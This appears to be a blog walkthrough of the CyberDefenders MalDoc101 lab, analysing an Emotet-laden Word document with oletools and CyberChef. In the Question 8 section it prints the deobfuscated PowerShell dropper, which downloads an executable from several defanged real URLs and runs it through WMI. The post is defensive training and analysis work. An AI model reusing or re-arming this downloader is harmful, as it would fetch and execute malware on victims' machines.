<!DOCTYPE html><html lang="en" > <!-- The Head v2.0 https://github.com/cotes2020/jekyll-theme-chirpy © 2017-2019 Cotes Chung MIT License --><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no"><title>CyberDefenders.org - Maldoc101 Walkthrough | Notepad+++</title><meta name="generator" content="Jekyll v4.2.2" /><meta property="og:title" content="CyberDefenders.org - Maldoc101 Walkthrough" /><meta name="author" content="remotephone" /><meta property="og:locale" content="en_US" /><meta name="description" content="Another go at CyberDefenders.org" /><meta property="og:description" content="Another go at CyberDefenders.org" /><link rel="canonical" href="https://remotephone.github.io/posts/CyberDefenders_maldoc101/" /><meta property="og:url" content="https://remotephone.github.io/posts/CyberDefenders_maldoc101/" /><meta property="og:site_name" content="Notepad+++" /><meta property="og:type" content="article" /><meta property="article:published_time" content="2021-04-13T00:40:00-05:00" /><meta name="twitter:card" content="summary" /><meta property="twitter:title" content="CyberDefenders.org - Maldoc101 Walkthrough" /><meta name="twitter:site" content="@remotephone" /><meta name="twitter:creator" content="@remotephone" /> <script type="application/ld+json"> {"author":{"@type":"Person","name":"remotephone"},"description":"Another go at CyberDefenders.org","@type":"BlogPosting","headline":"CyberDefenders.org - Maldoc101 Walkthrough","url":"https://remotephone.github.io/posts/CyberDefenders_maldoc101/","dateModified":"2021-04-13T00:40:00-05:00","datePublished":"2021-04-13T00:40:00-05:00","mainEntityOfPage":{"@type":"WebPage","@id":"https://remotephone.github.io/posts/CyberDefenders_maldoc101/"},"@context":"https://schema.org"}</script> <!-- The Favicons for Web, Android, Microsoft, and iOS (iPhone and iPad) Apps Generated by: https://www.favicon-generator.org/ v2.0 https://github.com/cotes2020/jekyll-theme-chirpy © 2019 Cotes Chung Published under the MIT license --><link rel="shortcut icon" href="/assets/img/favicons/favicon.ico" type="image/x-icon"><link rel="icon" href="/assets/img/favicons/favicon.ico" type="image/x-icon"><link rel="apple-touch-icon" href="/assets/img/favicons/apple-icon.png"><link rel="apple-touch-icon" href="/assets/img/favicons/apple-icon-precomposed.png"><link rel="apple-touch-icon" sizes="57x57" href="/assets/img/favicons/apple-icon-57x57.png"><link rel="apple-touch-icon" sizes="60x60" href="/assets/img/favicons/apple-icon-60x60.png"><link rel="apple-touch-icon" sizes="72x72" href="/assets/img/favicons/apple-icon-72x72.png"><link rel="apple-touch-icon" sizes="76x76" href="/assets/img/favicons/apple-icon-76x76.png"><link rel="apple-touch-icon" sizes="114x114" href="/assets/img/favicons/apple-icon-114x114.png"><link rel="apple-touch-icon" sizes="120x120" href="/assets/img/favicons/apple-icon-120x120.png"><link rel="apple-touch-icon" sizes="144x144" href="/assets/img/favicons/apple-icon-144x144.png"><link rel="apple-touch-icon" sizes="152x152" href="/assets/img/favicons/apple-icon-152x152.png"><link rel="apple-touch-icon" sizes="180x180" href="/assets/img/favicons/apple-icon-180x180.png"><link rel="icon" type="image/png" sizes="192x192" href="/assets/img/favicons/android-icon-192x192.png"><link rel="icon" type="image/png" sizes="32x32" href="/assets/img/favicons/favicon-32x32.png"><link rel="icon" type="image/png" sizes="96x96" href="/assets/img/favicons/favicon-96x96.png"><link rel="icon" type="image/png" sizes="16x16" href="/assets/img/favicons/favicon-16x16.png"><link rel="manifest" href="/assets/img/favicons/manifest.json"><meta name='msapplication-config' content='/assets/img/favicons/browserconfig.xml'><meta name="msapplication-TileColor" content="#ffffff"><meta name="msapplication-TileImage" content="/assets/img/favicons/ms-icon-144x144.png"><meta name="theme-color" content="#ffffff"><link rel="preconnect" href="https://fonts.gstatic.com" crossorigin="anonymous"><link rel="dns-prefetch" href="https://fonts.gstatic.com"><link rel="preconnect" href="https://www.google-analytics.com" crossorigin="use-credentials"><link rel="dns-prefetch" href="https://www.google-analytics.com"><link rel="preconnect" href="https://www.googletagmanager.com" crossorigin="anonymous"><link rel="dns-prefetch" href="https://www.googletagmanager.com"><link rel="preconnect" href="cdn.jsdelivr.net"><link rel="dns-prefetch" href="cdn.jsdelivr.net"><link rel="preload" as="style" href="https://cdn.jsdelivr.net/npm/bootstrap@4.0.0/dist/css/bootstrap.min.css" integrity="sha256-LA89z+k9fjgMKQ/kq4OO2Mrf8VltYml/VES+Rg0fh20=" crossorigin><link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/bootstrap@4.0.0/dist/css/bootstrap.min.css" integrity="sha256-LA89z+k9fjgMKQ/kq4OO2Mrf8VltYml/VES+Rg0fh20=" crossorigin="anonymous"><link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/@fortawesome/fontawesome-free@5.11.2/css/all.min.css" integrity="sha256-+N4/V/SbAFiW1MPBCXnfnP9QSN3+Keu+NlB+0ev/YKQ=" crossorigin="anonymous"> <!-- CSS selector for site. Chirpy v2.3 https://github.com/cotes2020/jekyll-theme-chirpy © 2020 Cotes Chung MIT Licensed --><link rel="preload" as="style" href="/assets/css/post.css"><link rel="stylesheet" href="/assets/css/post.css"><link rel="preload" as="style" href="/assets/css/lib/bootstrap-toc.min.css"><link rel="stylesheet" href="/assets/css/lib/bootstrap-toc.min.css" /><link rel="preload" as="script" href="https://cdn.jsdelivr.net/npm/jquery@3.4.1" integrity="sha256-CSXorXvZcTkaix6Yvo6HppcZGetbYMGWSFlBw8HfCJo=" crossorigin="anonymous"> <script src="https://cdn.jsdelivr.net/npm/jquery@3.4.1" integrity="sha256-CSXorXvZcTkaix6Yvo6HppcZGetbYMGWSFlBw8HfCJo=" crossorigin="anonymous"></script> <script src="https://cdn.jsdelivr.net/combine/npm/popper.js@1.15.0,npm/bootstrap@4.0.0/dist/js/bootstrap.min.js" async></script> <!-- JS selector for site. Chirpy v2.3 https://github.com/cotes2020/jekyll-theme-chirpy © 2020 Cotes Chung MIT Licensed --> <script src="/assets/js/post.min.js" async></script> <script src="/app.js" defer></script><meta name="twitter:site" content="@"><meta name="twitter:creator" content="@remotephone"><meta name="twitter:title" content="CyberDefenders.org - Maldoc101 Walkthrough"><meta name="twitter:description" content="My personal blog, mostly security focused."><meta name="twitter:card" content="summary_large_image"><meta name="twitter:image" content="https://remotephone.github.io/images/avatar.jpg"><body data-spy="scroll" data-target="#toc"><div id="sidebar" class="d-flex flex-column"> <!-- The Side Bar v2.0 https://github.com/cotes2020/jekyll-theme-chirpy © 2017-2019 Cotes Chung MIT License --><div id="nav-wrapper"><div id="profile-wrapper" class="d-flex flex-column"><div id="avatar" class="d-flex justify-content-center"> <a href="/" alt="avatar"> <img src="/images/avatar.jpg" alt="avatar" onerror="this.style.display='none'"> </a></div><div class="profile-text mt-3"><div class="site-title"> <a href="/">Notepad+++</a></div><div class="site-subtitle font-italic">Break it, fix it, write it down.</div></div></div><ul class="nav flex-column"><li class="nav-item d-flex justify-content-center "> <a href="/" class="nav-link d-flex justify-content-center align-items-center w-100"> <i class="fa-fw fas fa-home ml-xl-3 mr-xl-3 unloaded"></i> <span>HOME</span> </a></li><li class="nav-item d-flex justify-content-center "> <a href="/tabs/categories/" class="nav-link d-flex justify-content-center align-items-center w-100"> <i class="fa-fw fas fa-stream ml-xl-3 mr-xl-3 unloaded"></i> <span>CATEGORIES</span> </a></li><li class="nav-item d-flex justify-content-center "> <a href="/tabs/tags/" class="nav-link d-flex justify-content-center align-items-center w-100"> <i class="fa-fw fas fa-tags ml-xl-3 mr-xl-3 unloaded"></i> <span>TAGS</span> </a></li><li class="nav-item d-flex justify-content-center "> <a href="/tabs/archives/" class="nav-link d-flex justify-content-center align-items-center w-100"> <i class="fa-fw fas fa-archive ml-xl-3 mr-xl-3 unloaded"></i> <span>ARCHIVES</span> </a></li><li class="nav-item d-flex justify-content-center "> <a href="/tabs/about/" class="nav-link d-flex justify-content-center align-items-center w-100"> <i class="fa-fw fas fa-info ml-xl-3 mr-xl-3 unloaded"></i> <span>ABOUT</span> </a></li></ul></div><div class="sidebar-bottom d-flex flex-wrap justify-content-around mt-4"> <span id="mode-toggle-wrapper"> <!-- Switch the mode between dark and light. v2.1 https://github.com/cotes2020/jekyll-theme-chirpy © 2020 Cotes Chung MIT License --> <i class="mode-toggle fas fa-sun" dark-mode-invisible></i> <i class="mode-toggle fas fa-moon" light-mode-invisible></i> <script type="text/javascript"> class ModeToggle { static get MODE_KEY() { return "mode"; } static get DARK_MODE() { return "dark"; } static get LIGHT_MODE() { return "light"; } constructor() { if (this.mode != null) { if (this.mode == ModeToggle.DARK_MODE) { if (!this.isSysDarkPrefer) { this.setDark(); } } else { if (this.isSysDarkPrefer) { this.setLight(); } } } var self = this; /* always follow the system prefers */ this.sysDarkPrefers.addListener(function() { if (self.mode != null) { if (self.mode == ModeToggle.DARK_MODE) { if (!self.isSysDarkPrefer) { self.setDark(); } } else { if (self.isSysDarkPrefer) { self.setLight(); } } self.clearMode(); } }); } /* constructor() */ setDark() { $('html').attr(ModeToggle.MODE_KEY, ModeToggle.DARK_MODE); sessionStorage.setItem(ModeToggle.MODE_KEY, ModeToggle.DARK_MODE); } setLight() { $('html').attr(ModeToggle.MODE_KEY, ModeToggle.LIGHT_MODE); sessionStorage.setItem(ModeToggle.MODE_KEY, ModeToggle.LIGHT_MODE); } clearMode() { $('html').removeAttr(ModeToggle.MODE_KEY); sessionStorage.removeItem(ModeToggle.MODE_KEY); } get sysDarkPrefers() { return window.matchMedia("(prefers-color-scheme: dark)"); } get isSysDarkPrefer() { return this.sysDarkPrefers.matches; } get isDarkMode() { return this.mode == ModeToggle.DARK_MODE; } get isLightkMode() { return this.mode == ModeToggle.LIGHT_MODE; } get hasMode() { return this.mode != null; } get mode() { return sessionStorage.getItem(ModeToggle.MODE_KEY); } flipMode() { if (this.hasMode) { if (this.isSysDarkPrefer) { if (this.isLightkMode) { this.clearMode(); } else { this.setLight(); } } else { if (this.isDarkMode) { this.clearMode(); } else { this.setDark(); } } } else { if (this.isSysDarkPrefer) { this.setLight(); } else { this.setDark(); } } } /* flipMode() */ } /* ModeToggle */ let toggle = new ModeToggle(); $(".mode-toggle").click(function() { toggle.flipMode(); }); </script> </span> <span class="icon-border"></span> <a href="https://github.com/remotephone" target="_blank"> <i class="fab fa-github-alt"></i> </a> <a href="https://twitter.com/remotephone" target="_blank"> <i class="fab fa-twitter"></i> </a> <a href=" javascript:window.open('mailto:' + ['remotephone','gmail.com'].join('@'))" > <i class="fas fa-envelope"></i> </a> <a href="/feed.xml" > <i class="fas fa-rss"></i> </a></div></div><!-- The Top Bar v2.0 https://github.com/cotes2020/jekyll-theme-chirpy © 2017-2019 Cotes Chung MIT License --><div id="topbar-wrapper" class="row justify-content-center topbar-down"><div id="topbar" class="col-11 d-flex h-100 align-items-center justify-content-between"> <span id="breadcrumb"> <span> <a href="/"> Posts </a> </span> <span>CyberDefenders.org - Maldoc101 Walkthrough</span> </span> <i id="sidebar-trigger" class="fas fa-bars fa-fw"></i><div id="topbar-title"> Post</div><i id="search-trigger" class="fas fa-search fa-fw"></i> <span id="search-wrapper" class="align-items-center"> <i class="fas fa-search fa-fw"></i> <input class="form-control" id="search-input" type="search" placeholder="Search..."> <i class="fa fa-times-circle fa-fw" id="search-cleaner"></i> </span> <span id="search-cancel" >Cancel</span></div></div><div id="main-wrapper"><div id="main"> <!-- Fixed kramdown code highlight rendering: https://github.com/penibelst/jekyll-compress-html/issues/101 https://github.com/penibelst/jekyll-compress-html/issues/71#issuecomment-188144901 --><div class="row"><div id="post-wrapper" class="col-12 col-lg-11 col-xl-8"><div class="post pl-1 pr-1 pl-sm-2 pr-sm-2 pl-md-4 pr-md-4"><h1 data-toc-skip>CyberDefenders.org - Maldoc101 Walkthrough</h1><div class="post-meta text-muted d-flex flex-column"><div> Posted <!-- Date format snippet v2.4.1 https://github.com/cotes2020/jekyll-theme-chirpy © 2020 Cotes Chung MIT License --> <span class="timeago " data-toggle="tooltip" data-placement="bottom" title="Tue, Apr 13, 2021, 12:40 AM -0500" > Apr 13, 2021 <i class="unloaded">2021-04-13T00:40:00-05:00</i> </span> by <span class="author"> remotephone </span></div><div> Updated <!-- Date format snippet v2.4.1 https://github.com/cotes2020/jekyll-theme-chirpy © 2020 Cotes Chung MIT License --> <span class="timeago lastmod" data-toggle="tooltip" data-placement="bottom" title="Fri, Jul 8, 2022, 10:17 PM -0500" > Jul 8 <i class="unloaded">2022-07-08T22:17:59-05:00</i> </span></div></div><div class="post-content"><h1 id="another-go-at-cyberdefendersorg">Another go at CyberDefenders.org</h1><p>Having another go at a <a href="https://cyberdefenders.org/">CyberDefenders</a> challenge, this one about maldocs. You can find a link to the challenge <a href="https://cyberdefenders.org/labs/51">here</a>.</p><h2 id="environment">Environment</h2><p>I did this through Windows Subsystem for Linux 2. I already have that environment installed and working, but any linux environment should give you a very similar path to follow what I did.</p><p>I also grabbed <a href="https://github.com/decalage2/oletools">oletools</a> as this is the king of the maldoc analyzers. My install process followed the instructions on his page (slightly modified) to <code class="language-plaintext highlighter-rouge">pip3 install oletools --user</code> and I also separately grabbed oledump from <a href="https://blog.didierstevens.com/programs/oledump-py/">here</a> as it wasn’t included. Simply wget and unzipped it to my temporary working directory, which made a mess, but we only have one file we’re working with so who’s counting?</p><h2 id="some-notes">Some notes</h2><p>I appreciate them renaming this file to sample.bin so someone doesn’t accidentally maldoc themselves. I am also just generally impressed at the experience on this site. Just sign up, go to a lab, and start plugging away. I’m currently downloading a 27gig macos forensics image and I’m surprised no one’s charging me.</p><h2 id="question-1-what-streams-contain-macros-in-this-document">Question 1: What streams contain macros in this document?</h2><p>To know what they’re asking for here, it helps to be familiar with the structure of the file. Yet again, back at Didier Steven’s excellent documentation for info on that <a href="https://olefile.readthedocs.io/en/latest/OLE_Overview.html">here</a>.</p><p>His description is as follows:</p><div class="language-plaintext highlighter-rouge"><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
</pre><td class="rouge-code"><pre>An OLE file can be seen as a mini file system or a Zip archive: It contains streams of data that look like files embedded within the OLE file. Each stream has a name. For example, the main stream of a MS Word document containing its text is named “WordDocument”.

An OLE file can also contain storages. A storage is a folder that contains streams or other storages. For example, a MS Word document with VBA macros has a storage called “Macros”.

Special streams can contain properties. A property is a specific value that can be used to store information such as the metadata of a document (title, author, creation date, etc). Property stream names usually start with the character ‘\x05’ (ASCII code 5).
</pre></table></code></div></div><p>Ok that makes sense. Let’s oledump the file. This is the truncated output</p><div class="language-bash highlighter-rouge"><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
</pre><td class="rouge-code"><pre>computer@computer: ~/gits/MalDoc101
<span class="nv">$ </span>python oledump.py sample.bin                                                                               <span class="o">[</span>22:50:23]
  1:       114 <span class="s1">'\x01CompObj'</span>
  2:      4096 <span class="s1">'\x05DocumentSummaryInformation'</span>
  3:      4096 <span class="s1">'\x05SummaryInformation'</span>
  4:      7119 <span class="s1">'1Table'</span>
  5:    101483 <span class="s1">'Data'</span>
  6:       581 <span class="s1">'Macros/PROJECT'</span>
  7:       119 <span class="s1">'Macros/PROJECTwm'</span>
  8:     12997 <span class="s1">'Macros/VBA/_VBA_PROJECT'</span>
  9:      2112 <span class="s1">'Macros/VBA/__SRP_0'</span>
 10:       190 <span class="s1">'Macros/VBA/__SRP_1'</span>
 11:       532 <span class="s1">'Macros/VBA/__SRP_2'</span>
 12:       156 <span class="s1">'Macros/VBA/__SRP_3'</span>
 13: M    1367 <span class="s1">'Macros/VBA/diakzouxchouz'</span>
 14:       908 <span class="s1">'Macros/VBA/dir'</span>
 15: M    5705 <span class="s1">'Macros/VBA/govwiahtoozfaid'</span>
 16: m    1187 <span class="s1">'Macros/VBA/roubhaol'</span>
&lt;SNIP&gt;
</pre></table></code></div></div><p>We can see 3 streams identified with M for macro i guess. We submit 13,15,16 and get our first flag.</p><h2 id="question-2-what-event-is-used-to-begin-the-execution-of-the-macros">Question 2: What event is used to begin the execution of the macros?</h2><p>We can use olevba to break down this document in a way we can digest very easily. I pipe it to less because there is a lot of output and its good to start from the top. Right away, we see the function that’s guilty, <code class="language-plaintext highlighter-rouge">Document_open</code></p><div class="language-bash highlighter-rouge"><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
7
8
9
10
11
12
</pre><td class="rouge-code"><pre>olevba 0.56.1 on Python 3.8.5 - http://decalage.info/python/oletools
<span class="o">===============================================================================</span>
FILE: sample.bin
Type: OLE
<span class="nt">-------------------------------------------------------------------------------</span>
VBA MACRO diakzouxchouz.cls
<span class="k">in </span>file: sample.bin - OLE stream: <span class="s1">'Macros/VBA/diakzouxchouz'</span>
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Private Sub _
Document_open<span class="o">()</span>
boaxvoebxiotqueb
End Sub
</pre></table></code></div></div><p>You can read more about that <a href="https://docs.microsoft.com/en-us/office/vba/api/word.document.open">here</a> before submitting the flag.</p><h2 id="question-3-identify-the-malware-family">Question #3: Identify the malware family</h2><p>We can get a hash of the file and see if Virustotal has seen it yet, it should be pretty quick if it has.</p><p><a href="https://www.virustotal.com/gui/file/d50d98dcc8b7043cb5c38c3de36a2ad62b293704e3cf23b0cd7450174df53fee/detection">https://www.virustotal.com/gui/file/d50d98dcc8b7043cb5c38c3de36a2ad62b293704e3cf23b0cd7450174df53fee/detection</a></p><p>Luck would have it, its already been uploaded, and this is Emotet.</p><h2 id="question-4-what-stream-is-responsible-for-the-storage-of-the-base64-encoded-string">Question 4: What stream is responsible for the storage of the base64-encoded string?</h2><p>This one was honestly a guess for me. I tried olevba’ing it, I could see content was flagged as base64 encoded in the function <code class="language-plaintext highlighter-rouge">roubhaol</code> but I couldn’t find the exact stream. I oledump’ed the file again and reviewed the output</p><div class="language-bash highlighter-rouge"><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
</pre><td class="rouge-code"><pre> 31:       110 <span class="s1">'Macros/roubhaol/i09/i12/\x01CompObj'</span>
 32:        40 <span class="s1">'Macros/roubhaol/i09/i12/f'</span>
 33:         0 <span class="s1">'Macros/roubhaol/i09/i12/o'</span>
 34:     15164 <span class="s1">'Macros/roubhaol/i09/o'</span>
 35:        48 <span class="s1">'Macros/roubhaol/i09/x'</span>
 36:       444 <span class="s1">'Macros/roubhaol/o'</span>
</pre></table></code></div></div><p>My guess here was the biggest section must have it, so 34 is your flag.</p><h2 id="question-5-this-document-contains-a-user-form-provide-the-name">Question 5: This document contains a user-form. Provide the name?</h2><p>Here, we can oledir the file to see all the parts of it, and browse it as a directory structure.</p><div class="language-bash highlighter-rouge"><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
</pre><td class="rouge-code"><pre>computer@computer: ~/gits/MalDoc101
<span class="nv">$ </span>oledir sample.bin                                                                                          <span class="o">[</span>23:10:11]
oledir 0.54 - http://decalage.info/python/oletools
OLE directory entries <span class="k">in </span>file sample.bin:
<span class="nt">----</span>+------+-------+----------------------+-----+-----+-----+--------+------
<span class="nb">id</span>  |Status|Type   |Name                  |Left |Right|Child|1st Sect|Size
<span class="nt">----</span>+------+-------+----------------------+-----+-----+-----+--------+------
0   |&lt;Used&gt;|Root   |Root Entry            |-    |-    |3    |F3      |10112
1   |&lt;Used&gt;|Stream |Data                  |-    |-    |-    |8       |101483
2   |&lt;Used&gt;|Stream |1Table                |1    |-    |-    |CF      |7119
&lt;SNIP SNIP&gt;
12  |    govwiahtoozfaid         |5705  |
11  |    roubhaol                |1187  |
17  |  roubhaol                  |-     |
41  |    <span class="se">\x</span>01CompObj             |97    |
42  |    <span class="se">\x</span>03VBFrame             |292   |
18  |    f                       |510   |
20  |    i05                     |-     |6E182020-F460-11CE-9BCD-00AA00608E01
    |                            |      |Forms.Frame
23  |      <span class="se">\x</span>01CompObj           |112   |
21  |      f                     |44    |
22  |      o                     |0     |
24  |    i07                     |-     |6E182020-F460-11CE-9BCD-00AA00608E01
    |                            |      |Forms.Frame
27  |      <span class="se">\x</span>01CompObj           |112   |
25  |      f                     |44    |
26  |      o                     |0     |
28  |    i09                     |-     |46E31370-3F7A-11CE-BED6-00AA00611080
    |                            |      |Forms.MultiPage
&lt;SNIP SNIP&gt;
</pre></table></code></div></div><p>Here, we can clearly see that <code class="language-plaintext highlighter-rouge">roubhaol</code> again is the interesting part of the document, and that is our flag. The Forms.Frame and Forms.Multipage are indicators of the user form being present.</p><h2 id="question-6-this-document-contains-an-obfuscated-base64-encoded-string-what-value-is-used-to-pad-or-obfuscate-this-string">Question 6: This document contains an obfuscated base64 encoded string; what value is used to pad (or obfuscate) this string?</h2><p>Review the Suspicious string, this is a snippet of it.</p><div class="language-bash highlighter-rouge"><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
</pre><td class="rouge-code"><pre>�p2342772g3&amp;<span class="k">*</span>gs7712ffvs626fqo2342772g3&amp;<span class="k">*</span>gs7712ffvs626fqw2342772g3&amp;<span class="k">*</span>gs7712ffvs626fqe2342772g3&amp;<span class="k">*</span>gs7712ffvs626fqr2342772g3&amp;<span class="k">*</span>gs7712ffvs626fqs2342772g3&amp;<span class="k">*</span>gs7712ffvs626fqh2342772g3&amp;<span class="k">*</span>gs7712ffvs626fqeL2342772g3&amp;<span class="k">*</span>gs7712ffvs626fqL2342772g3&amp;<span class="k">*</span>gs7712ffvs626fq 2342772g3&amp;<span class="k">*</span>gs7712ffvs626fq-2342772g3&amp;<span class="k">*</span>gs7712ffvs626fqe2342772g3&amp;<span class="k">*</span>gs7712ffvs626fq JABsAG2342772g3&amp;<span class="k">*</span>gs7712ffvs626fqkAZQBj2342772g3&amp;<span class="k">*</span>gs7712ffvs626fqAGgAcg2342772g3&amp;<span class="k">*</span>gs7712ffvs626fqBvAHUA2342772g3&amp;<span class="k">*</span>gs7712ffvs626fqaAB3AH2342772g3&amp;<span class="k">*</span>gs7712ffvs626fqUAdwA92342772g3&amp;<span class="k">*</span>gs7712ffvs626fqACcAdg2342772g3&amp;<span class="k">*</span>gs7712ffvs626fqB1AGEA2342772g3&amp;<span class="k">*</span>gs7712ffvs626fqYwBkAG2342772g3&amp;<span class="k">*</span>gs7712ffvs626fq8AdQB22342772g3&amp;<span class="k">*</span>gs7712ffvs626fqAGMAaQ2342772g3&amp;<span class="k">*</span>gs7712ffvs626fqBvAHgA2342772g3&amp;<span class="k">*</span>gs7712ffvs626fqaABhAG2342772g3&amp;<span class="k">*</span>gs7712ffvs626fq8AbAAn2342772g3
</pre></table></code></div></div><p>What string do we see repeating? It’s difficult to get it visually, but since we less’ed the output of olevba, we can search for the string. I know that <code class="language-plaintext highlighter-rouge">42772g3&amp;</code> is going to be part of it, so if I start from the top of the doc and search down, we can see where that padding is split from the text.</p><div class="language-bash highlighter-rouge"><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
</pre><td class="rouge-code"><pre>feaxgeip <span class="o">=</span> Split<span class="o">(</span>geutyoeytiestheug, <span class="s2">"2342772g3&amp;*gs7712ffvs626fq"</span><span class="o">)</span>
</pre></table></code></div></div><h2 id="question-7-what-is-the-purpose-of-the-base64-encoded-string">Question 7: What is the purpose of the base64 encoded string?</h2><p>These are always hard for me because I don’t know exactly what the question wants. We can run the doc through <code class="language-plaintext highlighter-rouge">olevba sample.bin --reveal -a</code> which will give us the output we can work with, then take the very large text block that starts with <code class="language-plaintext highlighter-rouge">p2342772g3&amp;*gs7...</code> and get that into cyber chef to deobfuscate it. This <a href="https://gchq.github.io/CyberChef/#recipe=Find_/_Replace(%7B'option':'Simple%20string','string':'2342772g3%26*gs7712ffvs626fq'%7D,'',true,false,false,false)">recipe</a> will remove the padding,</p><p>Finally, this <a href="https://gchq.github.io/CyberChef/#recipe=Find_/_Replace(%7B'option':'Simple%20string','string':'2342772g3%26*gs7712ffvs626fq'%7D,'',true,false,false,false)Find_/_Replace(%7B'option':'Regex','string':'powersheLL%20-e%20'%7D,'',true,false,true,false)From_Base64('A-Za-z0-9%2B/%3D',true)Remove_null_bytes()">recipe</a> will clean up the script, remove the <code class="language-plaintext highlighter-rouge">powersheLL -e</code> from the beginning, and decode the base64.</p><p>To know you’re deobfuscating the correct string, it should start with <code class="language-plaintext highlighter-rouge">p234</code> and end with <code class="language-plaintext highlighter-rouge">fvs626fqA=</code>.</p><p>The flag ends up being the first word of the depadded script, powershell.</p><h2 id="question-8-what-wmi-class-is-used-to-create-the-process-to-launch-the-trojan">Question 8: What WMI class is used to create the process to launch the trojan?</h2><p>Now that we have the deobfuscated script, it should look something like this (I changed every instance of http or https to hxxp or hxxps):</p><div class="language-bash highlighter-rouge"><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
</pre><td class="rouge-code"><pre><span class="nv">$liechrouhwuw</span><span class="o">=</span><span class="s1">'vuacdouvcioxhaol'</span><span class="p">;</span><span class="o">[</span>Net.ServicePointManager]::<span class="s2">"SE</span><span class="sb">`</span>cuRiTy<span class="sb">`</span><span class="s2">PRO</span><span class="sb">`</span>ToC<span class="sb">`</span><span class="s2">ol"</span> <span class="o">=</span> <span class="s1">'tls12, tls11, tls'</span><span class="p">;</span><span class="nv">$deichbeudreir</span> <span class="o">=</span> <span class="s1">'337'</span><span class="p">;</span><span class="nv">$quoadgoijveum</span><span class="o">=</span><span class="s1">'duuvmoezhaitgoh'</span><span class="p">;</span><span class="nv">$toehfethxohbaey</span><span class="o">=</span><span class="nv">$env</span>:userprofile+<span class="s1">'\'</span>+<span class="nv">$deichbeudreir</span>+<span class="s1">'.exe'</span><span class="p">;</span><span class="nv">$sienteed</span><span class="o">=</span><span class="s1">'quainquachloaz'</span><span class="p">;</span><span class="nv">$reusthoas</span><span class="o">=</span>.<span class="o">(</span><span class="s1">'n'</span>+<span class="s1">'ew-ob'</span>+<span class="s1">'ject'</span><span class="o">)</span> nEt.weBclIenT<span class="p">;</span><span class="nv">$jacleewyiqu</span><span class="o">=</span><span class="s1">'hxxps://haoqunkong.com/bn/s9w4tgcjl_f6669ugu_w4bj/*hxxps://www.techtravel.events/informationl/8lsjhrl6nnkwgyzsudzam_h3wng_a6v5/*hxxp://digiwebmarketing.com/wp-admin/72t0jjhmv7takwvisfnz_eejvf_h6v2ix/*hxxp://holfve.se/images/1ckw5mj49w_2k11px_d/*hxxp://www.cfm.nl/_backup/yfhrmh6u0heidnwruwha2t4mjz6p_yxhyu390i6_q93hkh3ddm/'</span>.<span class="s2">"s</span><span class="sb">`</span>PliT<span class="s2">"([char]42);</span><span class="nv">$seccierdeeth</span><span class="s2">='duuzyeawpuaqu';foreach(</span><span class="nv">$geersieb</span><span class="s2"> in </span><span class="nv">$jacleewyiqu</span><span class="s2">){try{</span><span class="nv">$reusthoas</span><span class="s2">."</span>dOWN<span class="sb">`</span><span class="s2">loA</span><span class="sb">`</span>dfi<span class="sb">`</span><span class="s2">Le"</span><span class="o">(</span><span class="nv">$geersieb</span>, <span class="nv">$toehfethxohbaey</span><span class="o">)</span><span class="p">;</span><span class="nv">$buhxeuh</span><span class="o">=</span><span class="s1">'doeydeidquaijleuc'</span><span class="p">;</span>If <span class="o">((</span>.<span class="o">(</span><span class="s1">'Get-'</span>+<span class="s1">'Ite'</span>+<span class="s1">'m'</span><span class="o">)</span> <span class="nv">$toehfethxohbaey</span><span class="o">)</span>.<span class="s2">"l</span><span class="sb">`</span>eNGTH<span class="s2">" -ge 24751) {([wmiclass]'win32_Process')."</span>C<span class="sb">`</span><span class="s2">ReaTe"</span><span class="o">(</span><span class="nv">$toehfethxohbaey</span><span class="o">)</span><span class="p">;</span><span class="nv">$quoodteeh</span><span class="o">=</span><span class="s1">'jiafruuzlaolthoic'</span><span class="p">;</span><span class="nb">break</span><span class="p">;</span><span class="nv">$chigchienteiqu</span><span class="o">=</span><span class="s1">'yoowveihniej'</span><span class="o">}}</span>catch<span class="o">{}}</span><span class="nv">$toizluulfier</span><span class="o">=</span><span class="s1">'foqulevcaoj'</span>
</pre></table></code></div></div><p>We can pretty easily see the wmiclass <code class="language-plaintext highlighter-rouge">win32_Process</code> and that’s our next flag.</p><h2 id="question-9-multiple-domains-were-contacted-to-download-a-trojan-provide-first-fqdn-as-per-the-provided-hint">Question 9: Multiple domains were contacted to download a trojan. Provide first FQDN as per the provided hint</h2><p>We can see above pretty easily the first domain, <code class="language-plaintext highlighter-rouge">haoqunkong[.]com</code>. Submit it without the square brackets and we’re done.</p><h2 id="ok-thats-it-again">OK that’s it, again</h2><p>Good stuff yet again. I am enjoying the exercises and it’s nice to keep sharp on this stuff. Free form answers are sometimes tricky with investigative questions, but usually its pretty obvious. I used the first hint (the ones that dont take any points away) a few times, but they usually didn’t give me anything I could work with. Trial and error is your friend sometimes. Thanks for reading.</p></div><div class="post-tail-wrapper text-muted"><div class="post-meta mb-3"> <i class="far fa-folder-open fa-fw mr-1"></i> <a href='/categories/lab/'>lab</a>, <a href='/categories/homelab/'>homelab</a>, <a href='/categories/malware/'>malware</a>, <a href='/categories/workflow/'>workflow</a></div><div class="post-tail-bottom d-flex justify-content-between align-items-center mt-3 pt-5 pb-2"><div class="license-wrapper"> This post is licensed under <a href="https://creativecommons.org/licenses/by/4.0/">CC BY 4.0</a> by the author.</div><!-- Post sharing snippet v2.1 https://github.com/cotes2020/jekyll-theme-chirpy © 2019 Cotes Chung Published under the MIT License --><div class="share-wrapper"> <span class="share-label text-muted mr-1">Share</span> <span class="share-icons"> <a 